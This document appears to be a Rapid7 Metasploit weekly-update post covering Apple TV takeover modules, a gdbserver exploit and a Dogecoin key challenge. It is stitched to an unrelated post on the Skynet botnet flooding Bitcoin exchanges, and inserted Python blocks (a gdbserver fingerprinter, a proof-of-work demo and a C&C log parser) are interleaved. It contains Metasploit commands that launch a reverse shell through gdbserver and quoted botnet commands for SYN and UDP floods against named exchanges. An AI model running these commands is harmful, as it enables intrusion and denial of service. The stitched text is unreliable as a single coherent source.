Rapid7 Blog


Weekly Metasploit Update: Apple, GDB, and Dogecoin

Apple TV Tricks

This week, we have three new auxiliary modules that facilitate taking over Apple TV devices, all from community contributor 0a2940, with help from Wei sinn3r Chen and Dave TheLightCosine Maloney. Why Apple TV? Well, for starters, we already have modules for Google's Chromecast, a similar chunk of consumer hardware, and we didn't want Google to think we were picking on them. Secondly, these aren't just devices that live in people's living rooms. Apple TV has some level of marketing and presence in conference rooms -- in fact, there's literally a "Conference Room" display mode. This means that these devices, which are cheap (under $100 typically) and ubiquitous (at least, Apple hopes so), have a presence on many companies' networks, and almost certainly without any kind of formal IT control or asset management.

Finally, the access security is basically non-existent. By default, Apple TV devices have no password. If you want some security, you're likely to pick the "OnScreen" mode, where the TV screen displays a four-digit PIN which you are supposed to key into your streaming device (or Metasploit module). Of course, that's trivially bruteforced. Rarely, you'll find an Apple TV device set up with a proper password.

What's the risk? Well, if the display is in some public location and is being used for Serious Business(tm), a prankster can of course cause all kinds of hijinks, from the obvious (fill in your own shocking WTF image here) to the subtle (how about quietly replacing one financial results spreadsheet with another, on the fly?). Ultimately, though, we hope that research like this just brings some awareness to the coming Internet of Things and how we're apparently about to have tons and tons of these not-computer computers on our networks, just begging to be entry points for evil-doers. If Apple and Google, who are massive players in this IoT space, can't be bothered to engineer in some kind of sensible and user-friendly security-by-design on these things, how can we possibly expect newcomers with the next big IoT fad to fare any better?

The GDB Protocol

Last week, we added a new exploit module, "GDB Server Remote Payload Execution". If you've ever scanned a network full of developers, you might discover gdbserver, an unauthenticated remote service that allows developers to debug code in their kernel or on a different machine. Because of the nature of gdbserver, getting a shell is pretty straightforward: write a payload somewhere in RWX memory and execute it. To make things easier for a pentester, we implemented a few parts of the gdbserver protocol in the Msf::Exploit::Remote::Gdb mixin, so any module can leverage it.

There are lots of ways to get a shell from gdbserver, and there are lots of options that the remote service may or may not support. In addition, the service might be an independent gdbserver binary running on the remote (possibly not even attached to a program), or it might be a "remote stub" that is compiled into an application or kernel. Stubs usually support only a minimal set of features, so we made sure that the exploit module only used features in the required set. The exploit is pretty flexible: it discovers $PC, writes the payload, and continues execution. This is a rather destructive approach (since the original program will have memory contents overwritten), but since it is gdbserver we at least won't crash the target, just hang it if an interrupt or exception is thrown. Here's how to run the module against an arbitrary x86 Linux box:

```
msf> use exploits/multi/gdb/gdb_server_exec
msf> set payload linux/x86/shell_reverse_tcp
msf> set LHOST
msf> run
```

Right now, x86 and x86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so!

Hack my Dogecoin (Such Doxing. Wow.)

This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it's apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor for any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check if you can pick it up by using your phone's usual over-the-air (OTA) update process.

Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic.

New Modules

Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun.

Exploit modules

- Railo Remote File Include by Bryan Alexander and bperry exploits CVE-2014-5468
- GDB Server Remote Payload Execution by joev
- ManageEngine Eventlog Analyzer Arbitrary File Upload by Pedro Ribeiro and h0ng10 exploits CVE-2014-6037
- SolarWinds Storage Manager Authentication Bypass by juan vazquez and rgod exploits ZDI-14-299
- ManageEngine Desktop Central StatusUpdate Arbitrary File Upload by Pedro Ribeiro exploits CVE-2014-5005

Auxiliary and post modules

- Apple TV Image Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708
- Apple TV Video Remote Control by sinn3r and 0a29406d9794e4f9b30b3c5d6702c708
- AppleTV AirPlay Login Utility by 0a29406d9794e4f9b30b3c5d6702c708 and thelightcosine
- Android Open Source Platform (AOSP) Browser UXSS by joev and Rafay Baloch exploits CVE-2014-6041
- Arris DG950A Cable Modem Wifi Enumeration by Deral "Percent_X" Heiland

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.
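The GDB section above describes gdbserver as an unauthenticated service that anyone scanning a developer network can find. As an added example (not code from the post, and not Metasploit's Msf::Exploit::Remote::Gdb mixin), the Python below implements the framing of the GDB Remote Serial Protocol, the checksummed `$data#xx` packets the mixin also has to speak, and uses it to classify what a listening port sends back to a `qSupported` query, so an asset inventory can flag exposed debug stubs before a pentester does. The sample replies are constructed, not captured from a real host; `probe()` is a convenience wrapper that needs a live host and is not exercised offline.

```python
import socket

RSP_ESCAPE = 0x7D  # '}' : the byte that follows it is XORed with 0x20


def rsp_checksum(payload) -> int:
    """Modulo-256 sum of every byte between '$' and '#'."""
    return sum(payload) & 0xFF


def rsp_encode(data: bytes) -> bytes:
    """Frame data as $<escaped data>#<two hex digit checksum>."""
    escaped = bytearray()
    for b in data:
        if b in (0x24, 0x23, 0x7D):  # '$', '#' and '}' must be escaped
            escaped += bytes((RSP_ESCAPE, b ^ 0x20))
        else:
            escaped.append(b)
    return b"$" + bytes(escaped) + b"#%02x" % rsp_checksum(escaped)


def rsp_decode(frame: bytes) -> bytes:
    """Validate one frame and return its unescaped payload; ValueError on damage."""
    if len(frame) < 4 or frame[:1] != b"$" or frame[-3:-2] != b"#":
        raise ValueError("not an RSP frame: %r" % frame[:16])
    body, wire_sum = frame[1:-3], int(frame[-2:], 16)
    if rsp_checksum(body) != wire_sum:
        raise ValueError("checksum mismatch: got %02x want %02x" % (wire_sum, rsp_checksum(body)))
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] == RSP_ESCAPE:
            if i + 1 >= len(body):
                raise ValueError("dangling escape")
            out.append(body[i + 1] ^ 0x20)
            i += 2
        else:
            out.append(body[i])
            i += 1
    return bytes(out)


def parse_qsupported(payload: bytes) -> dict:
    """Turn 'PacketSize=3fff;qXfer:features:read+;multiprocess-' into a dict.
    'name+' -> True, 'name-' -> False, 'name?' -> None, 'name=value' -> value."""
    features = {}
    for item in payload.split(b";"):
        if not item:
            continue
        name = item.decode("ascii", "replace")
        if "=" in name:
            key, value = name.split("=", 1)
            features[key] = value
        elif name[-1] in "+-?":
            features[name[:-1]] = {"+": True, "-": False, "?": None}[name[-1]]
        else:
            features[name] = True
    return features


def fingerprint_gdb_stub(raw: bytes):
    """Classify the raw bytes a service returned after rsp_encode(b'qSupported').
    A stub acks with '+' and then sends its own frame.  Returns the parsed
    feature dict if the reply is well-formed RSP ({} for a minimal stub that
    answers qSupported with an empty packet), or None if it is not RSP at all."""
    data = raw.lstrip(b"+")  # acks may be repeated; drop them
    end = data.find(b"#")
    if not data.startswith(b"$") or end < 0 or len(data) < end + 3:
        return None
    try:
        return parse_qsupported(rsp_decode(data[: end + 3]))
    except ValueError:
        return None


def probe(host: str, port: int, timeout: float = 3.0):
    """Inventory helper: send qSupported to host:port and classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(rsp_encode(b"qSupported"))
        raw = b""
        try:
            while len(raw) < 4096:
                chunk = s.recv(4096)
                if not chunk:
                    break
                raw += chunk
                if b"#" in raw and len(raw) >= raw.find(b"#") + 3:
                    break
        except socket.timeout:
            pass
    return fingerprint_gdb_stub(raw)


# Constructed sample replies (assumptions for the demo, not real captures).
SAMPLE_GDBSERVER_REPLY = b"+" + rsp_encode(b"PacketSize=3fff;QPassSignals+;qXfer:features:read+;multiprocess+;swbreak+")
SAMPLE_MINIMAL_STUB_REPLY = b"+$#00"
SAMPLE_HTTP_REPLY = b"HTTP/1.1 400 Bad Request\r\n\r\n"

if __name__ == "__main__":
    print("probe packet:", rsp_encode(b"qSupported"))
    for label, reply in (("gdbserver", SAMPLE_GDBSERVER_REPLY),
                         ("minimal stub", SAMPLE_MINIMAL_STUB_REPLY),
                         ("not RSP", SAMPLE_HTTP_REPLY)):
        print(label, "->", fingerprint_gdb_stub(reply))
```

A reply containing `PacketSize` identifies a full gdbserver; an empty but correctly checksummed packet still proves something on that port speaks RSP and should be inventoried, while anything else (an HTTP banner, a checksum that does not verify) is ruled out without guessing.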

Botnets and the War on Bitcoin

If you've been reading the most recent news from the interwebs, you probably heard that Bitcoin is on a rollercoaster. If you're not familiar with it, Bitcoin is a global online currency, the cash of the Internet. It has no central regulator and no authority: it's a decentralized system where technology is in control. Bitcoins are generated by the people who are part of its network. Generating, or better "mining", Bitcoins requires your computer to perform an expensive cryptographic computation that, combined with a proof-of-work system, ensures that the user spent a certain amount of time and CPU power for each new coin. The global availability of Bitcoins affects the difficulty and cost of performing such computations. In this way Bitcoin regulates its own growth and distribution in the same way that we do with other limited resources such as gold and silver.

Bitcoin is controversial. It's an independent currency that no government or legal authority has control over, making it an interesting technological, social and economic experiment of recent years. However, it's also an investment: people are buying and selling Bitcoins all the time on exchanges, like every other traditional currency. As a consequence, an arms race started, with people clustering GPU and FPGA boards to be able to mine at a higher rate and sell the Bitcoins to make an actual profit. Over the last two years, this approach drew the attention of cybercrooks, who started using their botnets to run Bitcoin miners and introduce an additional source of income to their business. Some of the most recent botnets include ZeroAccess and Skynet, but there are many more following their lead, such as the one very recently uncovered by Kaspersky.

In the last few days, Bitcoin hit a historical record: it grew to a value of almost $270 each, an unprecedented and very promising result for the future of this currency.
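The paragraph above summarises mining as an expensive computation tied to a proof-of-work whose difficulty adapts to supply. As an added illustration that is not part of the original post, this Python sketch shows the mechanism in miniature: a double-SHA-256 hash must fall at or below a target, each extra zero bit doubles the expected search, verification costs a single hash, and a Bitcoin-style retarget shrinks the target when blocks arrive too fast. The header is a constructed placeholder rather than real block data, and the difficulty levels are tiny so the search finishes in well under a second.

```python
import hashlib
import struct
import time

# Constructed stand-in for a block header (a real Bitcoin header is 80 bytes:
# version, previous hash, merkle root, time, bits, nonce).  Only the nonce
# appended by pow_hash() varies during the search.
SAMPLE_HEADER = b"constructed-example-header:prev=0000;merkle=abcd;time=1365600000"


def pow_hash(header: bytes, nonce: int) -> int:
    """Double SHA-256 of header||nonce, read as a 256-bit little-endian
    integer, which is how Bitcoin compares a block hash against the target."""
    digest = hashlib.sha256(hashlib.sha256(header + struct.pack("<I", nonce)).digest()).digest()
    return int.from_bytes(digest, "little")


def target_for(zero_bits: int) -> int:
    """A hash is valid when hash <= target.  Requiring one more leading zero
    bit halves the acceptable range and so doubles the expected work."""
    return (1 << (256 - zero_bits)) - 1


def expected_attempts(zero_bits: int) -> int:
    """Each attempt succeeds with probability 2**-zero_bits."""
    return 1 << zero_bits


def mine(header: bytes, zero_bits: int, max_nonce: int = 1 << 32):
    """Brute-force search for a nonce; returns (nonce, attempts) or (None, attempts)."""
    target = target_for(zero_bits)
    for nonce in range(max_nonce):
        if pow_hash(header, nonce) <= target:
            return nonce, nonce + 1
    return None, max_nonce


def verify(header: bytes, nonce: int, zero_bits: int) -> bool:
    """Checking a claimed solution is one hash: cheap for everyone, unlike the search."""
    return pow_hash(header, nonce) <= target_for(zero_bits)


def retarget(target: int, actual_seconds: int, expected_seconds: int, max_factor: int = 4) -> int:
    """Bitcoin-style adjustment: scale the target by actual/expected interval
    time, clamped to a factor of max_factor either way.  More hashing power
    means blocks arrive early, the target shrinks and mining gets harder."""
    lower, upper = expected_seconds // max_factor, expected_seconds * max_factor
    clamped = max(lower, min(upper, actual_seconds))
    return target * clamped // expected_seconds   # integer math keeps 256-bit precision


if __name__ == "__main__":
    for bits in (8, 12, 16):
        start = time.perf_counter()
        nonce, attempts = mine(SAMPLE_HEADER, bits)
        elapsed = time.perf_counter() - start
        print(f"{bits:2d} zero bits: nonce={nonce} attempts={attempts} "
              f"(expected ~{expected_attempts(bits)}) in {elapsed:.3f}s, "
              f"verify={verify(SAMPLE_HEADER, nonce, bits)}")
    t = target_for(16)
    print("blocks twice as fast as planned -> target shrinks to", retarget(t, 300, 600) / t, "of before")
    print("blocks ten times as fast       -> clamped to       ", retarget(t, 60, 600) / t, "of before")
```

The asymmetry the post relies on is visible in the two function shapes: `mine()` loops, `verify()` does not. The retarget is what the post means by availability driving cost: when a botnet adds hashing power, blocks come early and the next target is lower for everyone.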
Then something suddenly happened: it dropped drastically, and at the time of writing it floats around $75. You can see it in the following graph:

The value of the currency is determined by its popularity and its availability. The drop might have been caused by a sudden increase in the availability of coins. There are several Bitcoin exchanges, of smaller and larger size. In the last few days Mt. Gox, the largest existing exchange, suffered some issues originally attributed to a DDoS attack and later attributed to a large and unexpected growth of their user base and the number of transactions they found themselves handling. As a result of the panic caused by the unavailability or slowness of the website, their users rushed into selling their Bitcoins and "cashing out", affecting the stability of the currency's value.

Can you see the issue here? There's a door open for speculation. If someone had the power to affect the stability of a Bitcoin exchange, they could force its users to sell their coins, buy them at a lower price and wait for the value to grow again before selling them and making a profit. In this scenario a DDoS would sound reasonable.

Haaave you met Skynet? We talked about this botnet and its colorful operator quite some months ago. No, he didn't stop operating his botnet, and we didn't stop tracking it and occasionally engaging in friendly conversations with him on Twitter.

![](/content/images/post-images/15971/Screen Shot 2013-04-10 at 11.47.22 PM.png)

Apparently the Operator understood the influence he might have, in just the same way as I described, and very recently started launching UDP and SYN flooding DDoS attacks against the Bitcoin exchanges VirWox, BitFloor and Mt. Gox. Following are DDoS commands issued by the operator in the very last days:

```
21:59 < suda> !udp 53 1000 1100 100 60
22:03 < suda> !udp 53 1000 1100 100 180
22:31 < suda> !syn bitfloor.com 443 100 60
03:36 < suda> !syn bitfloor.com 443 100 30
03:44 < suda> !syn bitfloor.com 443 100 5
03:52 < suda> !syn bitfloor.com 443 100 1
04:06 < suda> !syn bitfloor.com 443 1000 1
17:05 < suda> !syn mtgox.com 443 100 10
17:06 < suda> !syn mtgox.com 443 10 5
17:22 < suda> !syn bitfloor.com 443 1000 1
```

The owners of BitFloor lamented the issue as well:

> Skynet guy, that is not cool.

Bitcoin is a very interesting initiative, though it is encountering multiple obstacles along its way. Its usability issues will probably prevent it from going mainstream and leave the space free for Google Wallet and other similar services. However, its fundamental structure leaves it open to abuse and speculation by botnet operators, who can possibly influence the market in their favor and destabilize Bitcoin's economics. The fact that cybercriminals can be so instrumental in the fluctuation of the currency leaves me wondering whether they could effectively compromise the reliability of the system and undermine the ongoing investment efforts from the Bitcoin community. We are actively looking at malware and botnets abusing Bitcoin; if you encounter anything interesting please email me or tweet @botherder, sharing is caring!
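The command lines quoted above are the kind of artefact a defender gets from a monitored C&C channel, and the first question is which hosts and services were named and how often. As an added example that is not part of the post, this Python parses those lines (reproduced here as a constructed log excerpt in the `HH:MM < nick> !cmd args` shape shown), extracts host and port where the `!syn` form names them, and summarises command counts per target, flagging any host on a watch list. The trailing numeric fields, and the `!udp` arguments, are not documented in the post, so the parser keeps them verbatim rather than guessing their meaning.

```python
import re
from collections import Counter

# Constructed log excerpt reproducing the command lines quoted in the post.
SAMPLE_LOG = """\
21:59 < suda> !udp 53 1000 1100 100 60
22:03 < suda> !udp 53 1000 1100 100 180
22:31 < suda> !syn bitfloor.com 443 100 60
03:36 < suda> !syn bitfloor.com 443 100 30
03:44 < suda> !syn bitfloor.com 443 100 5
03:52 < suda> !syn bitfloor.com 443 100 1
04:06 < suda> !syn bitfloor.com 443 1000 1
17:05 < suda> !syn mtgox.com 443 100 10
17:06 < suda> !syn mtgox.com 443 10 5
17:22 < suda> !syn bitfloor.com 443 1000 1
"""

# IRC-style line: time, nick in angle brackets, then a bang command and its arguments.
LINE_RE = re.compile(r"^(?P<time>\d{2}:\d{2}) < (?P<nick>[^>]+)> !(?P<cmd>\w+)(?P<args>.*)$")
# Loose hostname check used only to decide whether the first argument names a target.
HOST_RE = re.compile(r"^[a-z0-9.-]+\.[a-z]{2,}$", re.I)


def parse_command(line: str):
    """Parse one C&C line into a dict, or None if it is not a bang command."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = m["args"].split()
    target, port = None, None
    # Only the !syn form names a host followed by a port.  The remaining numeric
    # fields (and every !udp field) have no documented meaning in the post, so
    # they are carried through untouched in 'args' instead of being interpreted.
    if args and HOST_RE.match(args[0]):
        target = args[0].lower()
        if len(args) > 1 and args[1].isdigit():
            port = int(args[1])
    return {"time": m["time"], "nick": m["nick"], "cmd": m["cmd"].lower(),
            "target": target, "port": port, "args": args}


def summarize(log_text: str, watched_hosts=()):
    """Count commands per (cmd, target, port) and list watched hosts that were named."""
    events = [e for e in map(parse_command, log_text.splitlines()) if e]
    by_target = Counter((e["cmd"], e["target"], e["port"]) for e in events)
    watched = {h.lower() for h in watched_hosts}
    hits = sorted({e["target"] for e in events if e["target"] in watched})
    return {"events": len(events), "by_target": by_target, "watched_hits": hits}


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG, watched_hosts=["mtgox.com", "example.invalid"])
    print("commands parsed:", report["events"])
    for (cmd, target, port), n in report["by_target"].most_common():
        print(f"  !{cmd:<4} target={target or '?'} port={port or '?'} x{n}")
    print("watched hosts named:", report["watched_hits"])
```

Feeding a watch list of your own exchange or customer domains turns the summary into an early-warning check; the count per target also shows the operator iterating on the last numeric field, which is worth noting even without knowing what it controls.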
